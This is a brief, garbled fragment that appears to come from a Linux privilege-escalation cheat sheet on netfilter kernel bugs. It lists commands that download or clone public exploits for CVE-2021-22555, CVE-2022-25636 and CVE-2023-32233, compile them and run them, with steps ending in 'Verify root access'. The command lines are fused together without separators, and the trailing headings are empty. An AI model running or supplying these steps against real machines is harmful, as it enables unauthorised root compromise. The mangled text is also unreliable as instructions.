netfilter
uname -rwget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.cgcc -m32 -static exploit.c -o exploit./exploitgit clone https://github.com/Bonfee/CVE-2022-25636.gitcd CVE-2022-25636make./exploitgit clone https://github.com/Liuk3r/CVE-2023-32233cd CVE-2023-32233gcc -Wall -o exploit exploit.c -lmnl -lnftnl./exploitCheck kernel version
Download exploit
Compile exploit (32-bit)
Run exploit
Verify root access
Key Concepts:
Last updated